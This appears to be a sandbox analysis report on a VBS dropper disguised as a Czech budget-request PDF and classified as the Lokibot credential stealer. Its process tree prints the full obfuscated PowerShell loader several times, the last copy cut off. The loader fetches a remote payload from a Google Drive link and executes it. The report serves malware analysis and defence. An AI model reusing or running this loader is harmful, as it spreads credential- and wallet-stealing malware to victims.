Overview

overview

10

Static

static

1

ŽÁDOST O...df.vbs

windows7-x64

10

ŽÁDOST O...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    113s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/09/2024, 14:09

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    ŽÁDOST O ROZPOČET 09-23-2024·pdf.vbs

  • Size

    35KB

  • MD5

    fa21d757a727ace9fab8ba22e03f7dc5

  • SHA1

    edaa3726683853a70e8176f2368e3254192a9a11

  • SHA256

    b8911aa1f56a7803220464354c15dbdce5c70d0b66b03bd0aba25c0155f2f161

  • SHA512

    3aaee7bc7a1726c193c36362d952c64eae4dc49ef2946bf430d8367cc012317ee7de3a761d3d079af72b8ce61d029b19f8fa3f24e1d8ba4d46064e0301f60925

  • SSDEEP

    384:3ccI8+xqQKYYKmlKCKQakPsZOqP1tVzFdk4GL283f48QihlTCEAZpdk/yKR:sc+AnjlKCKgE77V0z7lTCEAZIDR

Score
10/10
lokibotcollectioncredential_accessdiscoveryspywarestealertrojan

Malware Config

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 3 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ŽÁDOST O ROZPOČET 09-23-2024·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Byggest Nectocalyces Summarises #>;$schedar='Bardunstrammeren';<#Rhomboidally Ellipsoides Flkkser Trdokker #>;$Slipperweed=$host.PrivateData;If ($Slipperweed) {$Unplunderous162++;}function Disinclose($Dokstningen){$Tapery=$Dokstningen.Length-$Unplunderous162;for( $Kulos=5;$Kulos -lt $Tapery;$Kulos+=6){$Medunderskriv74+=$Dokstningen[$Kulos];}$Medunderskriv74;}function Planchers($viraginous){ & ($enrich) ($viraginous);}$Lnsummens=Disinclose 'RamipMOpholo Vrvlz IntriPhylolGeumalHyperasuper/P oto5Orga . omor0Hldni forma( O elWWitt iGallon Dat.dFo.eno Blksw.andbsHospi VaaseNWann,TSnurs C rne1Bimil0Schch. Ti,e0Abbie; Efte Trl WBeli iSch,znBygme6 Aspi4 alte;Forfl Fis exThysa6 Sylf4Afgif; Kolo Pur urPoseivTasse: A ti1Comec2Kund,1Merva.Forhj0Tra k) Mark ReferGGv.reeBegrlcUnc lkBedknoTroll/ Lovf2R.ndd0S ant1Bear 0 Bran0 Ulvs1Tup e0Gt sk1E ert SacliFTrommiPo,chrUdfrseParfefBankkoDeltax G um/Svves1Rerem2Midde1 Arch.Cusse0Sla s ';$Elephants=Disinclose ' L.dyuGangsSTyponETabu.RBokse-Uopl A BabbGUnmine Spe.N Gin,TC cae ';$Naturgivne=Disinclose ' onclhVolumtKli pt s.ibpAdelssTypis: Spri/ S,na/ LevadVejt.rTurneiUkrnkvOu dueFriez.PolyhgSerigoHuxtao Subtgspa tlRg,rleGuver.jud icO,livoPotenm Para/SkinnuEastbcHus.a?HoejseAyenfx BugspFlytnoPensir ReactTimem=Hvoridmelcho Ned wspedanT.gerl HepaoStormaRidsedAvi d&Be wai n,nrd Puma=Stb s1Flyc z minkcS vla5krediiDic,ytT norz DwarVLa.seGMagisJ .remiD vaseSemipYHarm,ABestu- TrirEMidte7KrydsRAfmrkA,undrrGldels BlomGSuperJ ba sJV terEPladePPoste5 ReekWspa omVac.uRAitesPnegliTForngkcent ';$Unprophetically=Disinclose 'B sto>Vridn ';$enrich=Disinclose 'StyleiHyp.eEUnd.lxUxo.i ';$Commonwealths57='Enurny';$Cyclometres = Disinclose 'TjeneeFl sncMishahOrkesoNialt Stand% Stomafnat pAeropp Fored Pampa S betUnphoaSorgl%Synsa\ Ef,eHHonduyBorergMunicrRes toOutropMin ahInf kt E hihLeveraUnundlVergimLathiinissecrecra. UdfldSalgsiMak ksKon m Malar& Aw.a&Flomm vineNormacTelefhEksalo Kada Mediat Blnd ';Planchers (Disinclose 'E ter$cote,gGaranl lacioJoggibLiquea.lamel Wac.:nimroVSoftlaValidnSeggid.rskeh,mpelaSabbanConveeProdu=Udstr(DefilcUncerm ElfedStatu Trans/ Fis cNonde Kon.$Idi.tCT eneyCard.cCensul ForloOve fm F gueFort.tEpicar C.areAilers Unsa)espad ');Planchers (Disinclose 'Ethan$CubdogHo delFlgeso.sprab Sulea Maryl .eel:DummkIl erinHu mefCuppir iageaBlessmRedireBore r Albocspermukne,arCowslinokkeaforplnRaksh=Strik$NvnemNBefumaRaff,tFlutturedskrFor dg olyiiO.teiv OvernBell et.tem.QueuesSa mepTiltvlWa vei Unr tSam a(Tjene$An,teUStarcnBeglep Was,rR,gnsoKnok pbaggahExurgeStngetFunktiDio tcSa ioaOverylProtolBjergyDoppe) Hirt ');Planchers (Disinclose ' Uds,[ RaadN nmese Matctgru,p.Soa lSSylpheSphenrIndbyvTypeeiS gelcKronoeAar mPRoomio SikkiProd n itchtMonodM .eriaWhipsnRy sjaFul cg DarieKle.urOndsk] F na:Uns.a: ondiSel eveAgurkcLokaluAlko rBibesiCloddtMaa eyDesioPBoligrStakloSt gmtBakkeoundivcJeb ioSuc.el nshi Bank =Unfac Depon[FrednNS.ciaeEvulgtibsen.SludeS SupeeFro,tcCruciuRosarrSouthiRodektUnproyJ aquPDampsrFo,bio nsttt Un goDrycocCorpuoD semlOpka.TansaeyUnpatpS ieleKalib]Rekvi:An id:ProppTSpiculTwin,s Subj1 Nyhe2Fam.l ');$Naturgivne=$Inframercurian[0];$Uforskyldte= (Disinclose 'Quino$BandegHushoLSmithOblgelbFin.raAcc,slRecla: CozeSvava a arpomCivilmadpreE No.vnLokalKLektonHv skYTrageTbegynTBonvie ConsRRaatr= avounCro zeOvervwPolen-PreteOCuredBSilicJForsgeper ucpiggeTP.eud c evvSfacetYAfstrs AfspTNazipeD vinMA isb.Skalkn DessE KnkktHeads.MisgowQuincenonimBafri cambulL Bromi StraeDialanunvort');$Uforskyldte+=$Vandhane[1];Planchers ($Uforskyldte);Planchers (Disinclose 'rask $ Co.nSCydonaBevelmInducmPer,oeForetn U frk igarn DesoyIntertAltsgtCovere FlamrSe.ia.AggluH OccueHvo iaNavnedParameMoldirArb jsRundh[ Orga$KnublEAtionl SprneSert.pBleskhHistoajrtegnmart,t DelpsMisop]Ufriv=Fishe$ oranLPri snKammesCarbiuGulnemAftenmRetsveSeracn For.sEndos ');$Hognut=Disinclose 'Op im$Sy ebSWi lyaBagermFut.rmAfspneo.rusn I,ogk.ermin ave y plattRummitCatche orbyrPolit.FormiDGab noSaxopwSyllonSk,ivl Tenoo BegraSpecidVirgiFvmme iKlu klUndepe Ka l(Eosid$Fo anNPleuraEnfratUnturuSkil.r.rovegSi keiCystovP iornUdbyteSwim,, Refe$LuiscdPhy.la BallcUdklatT taly de,al Drb.i Vin sNonpl)Ensil ';$dactylis=$Vandhane[0];Planchers (Disinclose '.ovet$TilkbgErgatlKrmmeo,rrisBKommuaRhamnlOver :RegenT Fr mAPre uK Do.nk StorENat eBsubh nP ejnn ,hefeMisadR U dd= rele(NahuatF idaeHymensBaf et Besv- Pri PAbnakAFructtSpec HClamm Trko.$Anterd CachAEjendCKlimaT gulvYHaandlUdkraiTomtesPos,s)Raill ');while (!$Takkebnner) {Planchers (Disinclose 'Exs c$Formbg R,tul f mco Sta bFolkeaAllerl Pho :UenigMSkrivu fluel Up.itO,erdiDiktaf Vandu lakenUdklacAttratFors,i,xtraoK ersnKahyt=Turri$RamastshelfrPampeuAphoteInter ') ;Planchers $Hognut;Planchers (Disinclose 'Kidd S NonbtsammeaGalgerLan stVibra-A,kriSUdma lKvabse VrtieBuddhpMirza Rede4,indb ');Planchers (Disinclose 'Turbo$polt.gMisnulTr maoNordebFlderaHala,l,ekyl:ForstT MajoaSulphkOverskAfvr eAntidbWin rnFrithnSkibseColter tand=Skde ( IsomTSpilleO.pebsTermitcurbl- Chu,PF,rlna Longt ,oldhJiggl Film $FaculdIndflaSabelc nict fleySmithlSh.rliAkvamsVerdo)Und.c ') ;Planchers (Disinclose ' Biri$,echegL ftmlInteroKont bIngseaAfhndlForfa:Pa tiAAs romAntist Fires Ko ekSkycaoloquamForv,massisu pse nF emte Se asT.rrw=dr.st$TrafigCupsel ntero Molib FolkaFisk,l asif: FierTUnta iOverspTi.rebPsychaWimplrCupcaeMutuasDev a+Bagho+Alitd%Bidac$TelesIOdlevnHirunf StoprPr.epaUmbr,mKolore CruirTyrancProj.u DdfdrD ligiL.proaOpdatnSamfu. Co,fcGafleoSjlesuDevasnVitiltO.ean ') ;$Naturgivne=$Inframercurian[$Amtskommunes];}$Declinable=334824;$duellanter=29405;Planchers (Disinclose 'Dan s$Bladeg VorhlRo.lioSta ubMlkssaProfelFripa: MelaQ TreduKa toaWoofed Nrs,rTahalaWattmnGuldbg ,ounlTppeleRhymedRela Repar= iop ConniGTrabaeCoelatBrn s-AffalCParatoStylonSpecttKargoeAkkvin HematSkova Restr$.elandPiquaaAvocacmattetSkrubyWharelLiqu.i jemmsUbiq. ');Planchers (Disinclose 'Pizza$ ndtjgdrypplI.dtnoOpdknbSubheaForg lNomog:boxesTxerogiFarvenCaloraDerelgVulpee Wate Trans=Tavle Ablat[ axinS pottyUnhees KombtPostseDeccimBrasi.M,croCS.reho inyanDredgv DorseReferrNibbet Urea] Crap:Cerat:PerigFSammermiswiosvovlmParadBSamtiaIncorsHurlbeLigbl6prion4Ta.blSDe fltPa errVesteiReknonArc.igS.eri( tops$TinklQ Aggru R asa AssidTemperDrypvaAstronCocktgn.rmalRig deRho od Kata)Sil,a ');Planchers (Disinclose 'Sydst$GenergSkovtl .elfoAtionbFyrreaLithol F rv:muligUArbejlretortAmrberShetlaFg nim RestoBoslon CynotTkkenaK ammnHype e Fjor Fl.uc=R ina Antil[RightS Gymny VulgsStuditkompae IndhmRhamn.SlatiTA varesubcoxHvlvetUnder. PhosELeap nEskadcForkloUrkokdSkrd ieddi.n stangKjort]S,ine: etin:AktstAKr geSKlapsCPolygI for,I Indi.Go erGF emmeForest NewzSAfdritBohemr ilgiiPh tonUdfung Elec( N ll$StormT prisiHotelnSkbneaSpo,sgCorneees or) Nons ');Planchers (Disinclose 'salpe$ ampagincublRorp oSlethbNed,ua MetalFo,br:I hneAu crynOve plSatsegStormsAdjurg iguraP rthr ublitAnfren.crodeTiltvr trafi prove emirAugme=Tami $P ykoUScopolDignitFluktrSpotraBae.ymLatt oStrabnFritit Debaa LigknDespoeViktu..andbsFor,wusilhob IsopsSp idt DevirTikaniInsubnNeddyg Out (Bronc$Unw aDWo dhe.angac verlSnrkeiBetalnTra ca ubskbBetjelexpeceBedre,Subj $Com udBasi.uScobleCoydol enzlSlyngaKrig.nRddeltFjesceHabitr Sylf)antec ');Planchers $Anlgsgartnerier;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hygrophthalmic.dis && echo t"
        3⤵
          PID:2844
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Byggest Nectocalyces Summarises #>;$schedar='Bardunstrammeren';<#Rhomboidally Ellipsoides Flkkser Trdokker #>;$Slipperweed=$host.PrivateData;If ($Slipperweed) {$Unplunderous162++;}function Disinclose($Dokstningen){$Tapery=$Dokstningen.Length-$Unplunderous162;for( $Kulos=5;$Kulos -lt $Tapery;$Kulos+=6){$Medunderskriv74+=$Dokstningen[$Kulos];}$Medunderskriv74;}function Planchers($viraginous){ & ($enrich) ($viraginous);}$Lnsummens=Disinclose 'RamipMOpholo Vrvlz IntriPhylolGeumalHyperasuper/P oto5Orga . omor0Hldni forma( O elWWitt iGallon Dat.dFo.eno Blksw.andbsHospi VaaseNWann,TSnurs C rne1Bimil0Schch. Ti,e0Abbie; Efte Trl WBeli iSch,znBygme6 Aspi4 alte;Forfl Fis exThysa6 Sylf4Afgif; Kolo Pur urPoseivTasse: A ti1Comec2Kund,1Merva.Forhj0Tra k) Mark ReferGGv.reeBegrlcUnc lkBedknoTroll/ Lovf2R.ndd0S ant1Bear 0 Bran0 Ulvs1Tup e0Gt sk1E ert SacliFTrommiPo,chrUdfrseParfefBankkoDeltax G um/Svves1Rerem2Midde1 Arch.Cusse0Sla s ';$Elephants=Disinclose ' L.dyuGangsSTyponETabu.RBokse-Uopl A BabbGUnmine Spe.N Gin,TC cae ';$Naturgivne=Disinclose ' onclhVolumtKli pt s.ibpAdelssTypis: Spri/ S,na/ LevadVejt.rTurneiUkrnkvOu dueFriez.PolyhgSerigoHuxtao Subtgspa tlRg,rleGuver.jud icO,livoPotenm Para/SkinnuEastbcHus.a?HoejseAyenfx BugspFlytnoPensir ReactTimem=Hvoridmelcho Ned wspedanT.gerl HepaoStormaRidsedAvi d&Be wai n,nrd Puma=Stb s1Flyc z minkcS vla5krediiDic,ytT norz DwarVLa.seGMagisJ .remiD vaseSemipYHarm,ABestu- TrirEMidte7KrydsRAfmrkA,undrrGldels BlomGSuperJ ba sJV terEPladePPoste5 ReekWspa omVac.uRAitesPnegliTForngkcent ';$Unprophetically=Disinclose 'B sto>Vridn ';$enrich=Disinclose 'StyleiHyp.eEUnd.lxUxo.i ';$Commonwealths57='Enurny';$Cyclometres = Disinclose 'TjeneeFl sncMishahOrkesoNialt Stand% Stomafnat pAeropp Fored Pampa S betUnphoaSorgl%Synsa\ Ef,eHHonduyBorergMunicrRes toOutropMin ahInf kt E hihLeveraUnundlVergimLathiinissecrecra. UdfldSalgsiMak ksKon m Malar& Aw.a&Flomm vineNormacTelefhEksalo Kada Mediat Blnd ';Planchers (Disinclose 'E ter$cote,gGaranl lacioJoggibLiquea.lamel Wac.:nimroVSoftlaValidnSeggid.rskeh,mpelaSabbanConveeProdu=Udstr(DefilcUncerm ElfedStatu Trans/ Fis cNonde Kon.$Idi.tCT eneyCard.cCensul ForloOve fm F gueFort.tEpicar C.areAilers Unsa)espad ');Planchers (Disinclose 'Ethan$CubdogHo delFlgeso.sprab Sulea Maryl .eel:DummkIl erinHu mefCuppir iageaBlessmRedireBore r Albocspermukne,arCowslinokkeaforplnRaksh=Strik$NvnemNBefumaRaff,tFlutturedskrFor dg olyiiO.teiv OvernBell et.tem.QueuesSa mepTiltvlWa vei Unr tSam a(Tjene$An,teUStarcnBeglep Was,rR,gnsoKnok pbaggahExurgeStngetFunktiDio tcSa ioaOverylProtolBjergyDoppe) Hirt ');Planchers (Disinclose ' Uds,[ RaadN nmese Matctgru,p.Soa lSSylpheSphenrIndbyvTypeeiS gelcKronoeAar mPRoomio SikkiProd n itchtMonodM .eriaWhipsnRy sjaFul cg DarieKle.urOndsk] F na:Uns.a: ondiSel eveAgurkcLokaluAlko rBibesiCloddtMaa eyDesioPBoligrStakloSt gmtBakkeoundivcJeb ioSuc.el nshi Bank =Unfac Depon[FrednNS.ciaeEvulgtibsen.SludeS SupeeFro,tcCruciuRosarrSouthiRodektUnproyJ aquPDampsrFo,bio nsttt Un goDrycocCorpuoD semlOpka.TansaeyUnpatpS ieleKalib]Rekvi:An id:ProppTSpiculTwin,s Subj1 Nyhe2Fam.l ');$Naturgivne=$Inframercurian[0];$Uforskyldte= (Disinclose 'Quino$BandegHushoLSmithOblgelbFin.raAcc,slRecla: CozeSvava a arpomCivilmadpreE No.vnLokalKLektonHv skYTrageTbegynTBonvie ConsRRaatr= avounCro zeOvervwPolen-PreteOCuredBSilicJForsgeper ucpiggeTP.eud c evvSfacetYAfstrs AfspTNazipeD vinMA isb.Skalkn DessE KnkktHeads.MisgowQuincenonimBafri cambulL Bromi StraeDialanunvort');$Uforskyldte+=$Vandhane[1];Planchers ($Uforskyldte);Planchers (Disinclose 'rask $ Co.nSCydonaBevelmInducmPer,oeForetn U frk igarn DesoyIntertAltsgtCovere FlamrSe.ia.AggluH OccueHvo iaNavnedParameMoldirArb jsRundh[ Orga$KnublEAtionl SprneSert.pBleskhHistoajrtegnmart,t DelpsMisop]Ufriv=Fishe$ oranLPri snKammesCarbiuGulnemAftenmRetsveSeracn For.sEndos ');$Hognut=Disinclose 'Op im$Sy ebSWi lyaBagermFut.rmAfspneo.rusn I,ogk.ermin ave y plattRummitCatche orbyrPolit.FormiDGab noSaxopwSyllonSk,ivl Tenoo BegraSpecidVirgiFvmme iKlu klUndepe Ka l(Eosid$Fo anNPleuraEnfratUnturuSkil.r.rovegSi keiCystovP iornUdbyteSwim,, Refe$LuiscdPhy.la BallcUdklatT taly de,al Drb.i Vin sNonpl)Ensil ';$dactylis=$Vandhane[0];Planchers (Disinclose '.ovet$TilkbgErgatlKrmmeo,rrisBKommuaRhamnlOver :RegenT Fr mAPre uK Do.nk StorENat eBsubh nP ejnn ,hefeMisadR U dd= rele(NahuatF idaeHymensBaf et Besv- Pri PAbnakAFructtSpec HClamm Trko.$Anterd CachAEjendCKlimaT gulvYHaandlUdkraiTomtesPos,s)Raill ');while (!$Takkebnner) {Planchers (Disinclose 'Exs c$Formbg R,tul f mco Sta bFolkeaAllerl Pho :UenigMSkrivu fluel Up.itO,erdiDiktaf Vandu lakenUdklacAttratFors,i,xtraoK ersnKahyt=Turri$RamastshelfrPampeuAphoteInter ') ;Planchers $Hognut;Planchers (Disinclose 'Kidd S NonbtsammeaGalgerLan stVibra-A,kriSUdma lKvabse VrtieBuddhpMirza Rede4,indb ');Planchers (Disinclose 'Turbo$polt.gMisnulTr maoNordebFlderaHala,l,ekyl:ForstT MajoaSulphkOverskAfvr eAntidbWin rnFrithnSkibseColter tand=Skde ( IsomTSpilleO.pebsTermitcurbl- Chu,PF,rlna Longt ,oldhJiggl Film $FaculdIndflaSabelc nict fleySmithlSh.rliAkvamsVerdo)Und.c ') ;Planchers (Disinclose ' Biri$,echegL ftmlInteroKont bIngseaAfhndlForfa:Pa tiAAs romAntist Fires Ko ekSkycaoloquamForv,massisu pse nF emte Se asT.rrw=dr.st$TrafigCupsel ntero Molib FolkaFisk,l asif: FierTUnta iOverspTi.rebPsychaWimplrCupcaeMutuasDev a+Bagho+Alitd%Bidac$TelesIOdlevnHirunf StoprPr.epaUmbr,mKolore CruirTyrancProj.u DdfdrD ligiL.proaOpdatnSamfu. Co,fcGafleoSjlesuDevasnVitiltO.ean ') ;$Naturgivne=$Inframercurian[$Amtskommunes];}$Declinable=334824;$duellanter=29405;Planchers (Disinclose 'Dan s$Bladeg VorhlRo.lioSta ubMlkssaProfelFripa: MelaQ TreduKa toaWoofed Nrs,rTahalaWattmnGuldbg ,ounlTppeleRhymedRela Repar= iop ConniGTrabaeCoelatBrn s-AffalCParatoStylonSpecttKargoeAkkvin HematSkova Restr$.elandPiquaaAvocacmattetSkrubyWharelLiqu.i jemmsUbiq. ');Planchers (Disinclose 'Pizza$ ndtjgdrypplI.dtnoOpdknbSubheaForg lNomog:boxesTxerogiFarvenCaloraDerelgVulpee Wate Trans=Tavle Ablat[ axinS pottyUnhees KombtPostseDeccimBrasi.M,croCS.reho inyanDredgv DorseReferrNibbet Urea] Crap:Cerat:PerigFSammermiswiosvovlmParadBSamtiaIncorsHurlbeLigbl6prion4Ta.blSDe fltPa errVesteiReknonArc.igS.eri( tops$TinklQ Aggru R asa AssidTemperDrypvaAstronCocktgn.rmalRig deRho od Kata)Sil,a ');Planchers (Disinclose 'Sydst$GenergSkovtl .elfoAtionbFyrreaLithol F rv:muligUArbejlretortAmrberShetlaFg nim RestoBoslon CynotTkkenaK ammnHype e Fjor Fl.uc=R ina Antil[RightS Gymny VulgsStuditkompae IndhmRhamn.SlatiTA varesubcoxHvlvetUnder. PhosELeap nEskadcForkloUrkokdSkrd ieddi.n stangKjort]S,ine: etin:AktstAKr geSKlapsCPolygI for,I Indi.Go erGF emmeForest NewzSAfdritBohemr ilgiiPh tonUdfung Elec( N ll$StormT prisiHotelnSkbneaSpo,sgCorneees or) Nons ');Planchers (Disinclose 'salpe$ ampagincublRorp oSlethbNed,ua MetalFo,br:I hneAu crynOve plSatsegStormsAdjurg iguraP rthr ublitAnfren.crodeTiltvr trafi prove emirAugme=Tami $P ykoUScopolDignitFluktrSpotraBae.ymLatt oStrabnFritit Debaa LigknDespoeViktu..andbsFor,wusilhob IsopsSp idt DevirTikaniInsubnNeddyg Out (Bronc$Unw aDWo dhe.angac verlSnrkeiBetalnTra ca ubskbBetjelexpeceBedre,Subj $Com udBasi.uScobleCoydol enzlSlyngaKrig.nRddeltFjesceHabitr Sylf)antec ');Planchers $Anlgsgartnerier;"
          3⤵
          • Network Service Discovery
          • Suspicious use of WriteProcessMemory
          PID:1320
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Byggest Nectocalyces Summarises #>;$schedar='Bardunstrammeren';<#Rhomboidally Ellipsoides Flkkser Trdokker #>;$Slipperweed=$host.PrivateData;If ($Slipperweed) {$Unplunderous162++;}function Disinclose($Dokstningen){$Tapery=$Dokstningen.Length-$Unplunderous162;for( $Kulos=5;$Kulos -lt $Tapery;$Kulos+=6){$Medunderskriv74+=$Dokstningen[$Kulos];}$Medunderskriv74;}function Planchers($viraginous){ & ($enrich) ($viraginous);}$Lnsummens=Disinclose 'RamipMOpholo Vrvlz IntriPhylolGeumalHyperasuper/P oto5Orga . omor0Hldni forma( O elWWitt iGallon Dat.dFo.eno Blksw.andbsHospi VaaseNWann,TSnurs C rne1Bimil0Schch. Ti,e0Abbie; Efte Trl WBeli iSch,znBygme6 Aspi4 alte;Forfl Fis exThysa6 Sylf4Afgif; Kolo Pur urPoseivTasse: A ti1Comec2Kund,1Merva.Forhj0Tra k) Mark ReferGGv.reeBegrlcUnc lkBedknoTroll/ Lovf2R.ndd0S ant1Bear 0 Bran0 Ulvs1Tup e0Gt sk1E ert SacliFTrommiPo,chrUdfrseParfefBankkoDeltax G um/Svves1Rerem2Midde1 Arch.Cusse0Sla s ';$Elephants=Disinclose ' L.dyuGangsSTyponETabu.RBokse-Uopl A BabbGUnmine Spe.N Gin,TC cae ';$Naturgivne=Disinclose ' onclhVolumtKli pt s.ibpAdelssTypis: Spri/ S,na/ LevadVejt.rTurneiUkrnkvOu dueFriez.PolyhgSerigoHuxtao Subtgspa tlRg,rleGuver.jud icO,livoPotenm Para/SkinnuEastbcHus.a?HoejseAyenfx BugspFlytnoPensir ReactTimem=Hvoridmelcho Ned wspedanT.gerl HepaoStormaRidsedAvi d&Be wai n,nrd Puma=Stb s1Flyc z minkcS vla5krediiDic,ytT norz DwarVLa.seGMagisJ .remiD vaseSemipYHarm,ABestu- TrirEMidte7KrydsRAfmrkA,undrrGldels BlomGSuperJ ba sJV terEPladePPoste5 ReekWspa omVac.uRAitesPnegliTForngkcent ';$Unprophetically=Disinclose 'B sto>Vridn ';$enrich=Disinclose 'StyleiHyp.eEUnd.lxUxo.i ';$Commonwealths57='Enurny';$Cyclometres = Disinclose 'TjeneeFl sncMishahOrkesoNialt Stand% Stomafnat pAeropp Fored Pampa S betUnphoaSorgl%Synsa\ Ef,eHHonduyBorergMunicrRes toOutropMin ahInf kt E hihLeveraUnundlVergimLathiinissecrecra. UdfldSalgsiMak ksKon m Malar& Aw.a&Flomm vineNormacTelefhEksalo Kada Mediat Blnd ';Planchers (Disinclose 'E ter$cote,gGaranl lacioJoggibLiquea.lamel Wac.:nimroVSoftlaValidnSeggid.rskeh,mpelaSabbanConveeProdu=Udstr(DefilcUncerm ElfedStatu Trans/ Fis cNonde Kon.$Idi.tCT eneyCard.cCensul ForloOve fm F gueFort.tEpicar C.areAilers Unsa)espad ');Planchers (Disinclose 'Ethan$CubdogHo delFlgeso.sprab Sulea Maryl .eel:DummkIl erinHu mefCuppir iageaBlessmRedireBore r Albocspermukne,arCowslinokkeaforplnRaksh=Strik$NvnemNBefumaRaff,tFlutturedskrFor dg olyiiO.teiv OvernBell et.tem.QueuesSa mepTiltvlWa vei Unr tSam a(Tjene$An,teUStarcnBeglep Was,rR,gnsoKnok pbaggahExurgeStngetFunktiDio tcSa ioaOverylProtolBjergyDoppe) Hirt ');Planchers (Disinclose ' Uds,[ RaadN nmese Matctgru,p.Soa lSSylpheSphenrIndbyvTypeeiS gelcKronoeAar mPRoomio SikkiProd n itchtMonodM .eriaWhipsnRy sjaFul cg DarieKle.urOndsk] F na:Uns.a: ondiSel eveAgurkcLokaluAlko rBibesiCloddtMaa eyDesioPBoligrStakloSt gmtBakkeoundivcJeb ioSuc.el nshi Bank =Unfac Depon[FrednNS.ciaeEvulgtibsen.SludeS SupeeFro,tcCruciuRosarrSouthiRodektUnproyJ aquPDampsrFo,bio nsttt Un goDrycocCorpuoD semlOpka.TansaeyUnpatpS ieleKalib]Rekvi:An id:ProppTSpiculTwin,s Subj1 Nyhe2Fam.l ');$Naturgivne=$Inframercurian[0];$Uforskyldte= (Disinclose 'Quino$BandegHushoLSmithOblgelbFin.raAcc,slRecla: CozeSvava a arpomCivilmadpreE No.vnLokalKLektonHv skYTrageTbegynTBonvie ConsRRaatr= avounCro zeOvervwPolen-PreteOCuredBSilicJForsgeper ucpiggeTP.eud c evvSfacetYAfstrs AfspTNazipeD vinMA isb.Skalkn DessE KnkktHeads.MisgowQuincenonimBafri cambulL Bromi StraeDialanunvort');$Uforskyldte+=$Vandhane[1];Planchers ($Uforskyldte);Planchers (Disinclose 'rask $ Co.nSCydonaBevelmInducmPer,oeForetn U frk igarn DesoyIntertAltsgtCovere FlamrSe.ia.AggluH OccueHvo iaNavnedParameMoldirArb jsRundh[ Orga$KnublEAtionl SprneSert.pBleskhHistoajrtegnmart,t DelpsMisop]Ufriv=Fishe$ oranLPri snKammesCarbiuGulnemAftenmRetsveSeracn For.sEndos ');$Hognut=Disinclose 'Op im$Sy ebSWi lyaBagermFut.rmAfspneo.rusn I,ogk.ermin ave y plattRummitCatche orbyrPolit.FormiDGab noSaxopwSyllonSk,ivl Tenoo BegraSpecidVirgiFvmme iKlu klUndepe Ka l(Eosid$Fo anNPleuraEnfratUnturuSkil.r.rovegSi keiCystovP iornUdbyteSwim,, Refe$LuiscdPhy.la BallcUdklatT taly de,al Drb.i Vin sNonpl)Ensil ';$dactylis=$Vandhane[0];Planchers (Disinclose '.ovet$TilkbgErgatlKrmmeo,rrisBKommuaRhamnlOver :RegenT Fr mAPre uK Do.nk StorENat eBsubh nP ejnn ,hefeMisadR U dd= rele(NahuatF idaeHymensBaf et Besv- Pri PAbnakAFructtSpec HClamm Trko.$Anterd CachAEjendCKlimaT gulvYHaandlUdkraiTomtesPos,s)Raill ');while (!$Takkebnner) {Planchers (Disinclose 'Exs c$Formbg R,tul f mco Sta bFolkeaAllerl Pho :UenigMSkrivu fluel Up.itO,erdiDiktaf Vandu lakenUdklacAttratFors,i,xtraoK ersnKahyt=Turri$RamastshelfrPampeuAphoteInter ') ;Planchers $Hognut;Planchers (Disinclose 'Kidd S NonbtsammeaGalgerLan stVibra-A,kriSUdma lKvabse VrtieBuddhpMirza Rede4,indb ');Planchers (Disinclose 'Turbo$polt.gMisnulTr maoNordebFlderaHala,l,ekyl:ForstT MajoaSulphkOverskAfvr eAntidbWin rnFrithnSkibseColter tand=Skde ( IsomTSpilleO.pebsTermitcurbl- Chu,PF,rlna Longt ,oldhJiggl Film $FaculdIndflaSabelc nict fleySmithlSh.rliAkvamsVerdo)Und.c ') ;Planchers (Disinclose ' Biri$,echegL ftmlInteroKont bIngseaAfhndlForfa:Pa tiAAs romAntist Fires Ko ekSkycaoloquamForv,massisu pse nF emte Se asT.rrw=dr.st$TrafigCupsel ntero Molib FolkaFisk,l asif: FierTUnta iOverspTi.rebPsychaWimplrCupcaeMutuasDev a+Bagho+Alitd%Bidac$TelesIOdlevnHirunf StoprPr.epaUmbr,mKolore CruirTyrancProj.u DdfdrD ligiL.proaOpdatnSamfu. Co,fcGafleoSjlesuDevasnVitiltO.ean ') ;$Naturgivne=$Inframercurian[$Amtskommunes];}$Declinable=334824;$duellanter=29405;Planchers (Disinclose 